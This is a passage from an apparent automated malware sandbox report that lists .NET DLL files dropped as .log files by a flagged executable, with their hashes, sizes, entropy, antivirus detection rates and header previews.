                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\GxRSZgBO.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\IHWAbonb.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\IPEdAXAX.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\JEwTrooN.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\KFhcUPbS.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\KpuBgggp.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\LWkTXfAf.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\LcQaEBDP.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\LljRCdQC.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\LqfKJGTv.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\MtmZLckZ.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\NgGUXyfg.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\NqOhhczU.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\NvmJyloG.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ObZHJZRv.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\OgVBQDTo.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\OkvSnMWj.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\OqbZUiZT.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\OwGrvDOt.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

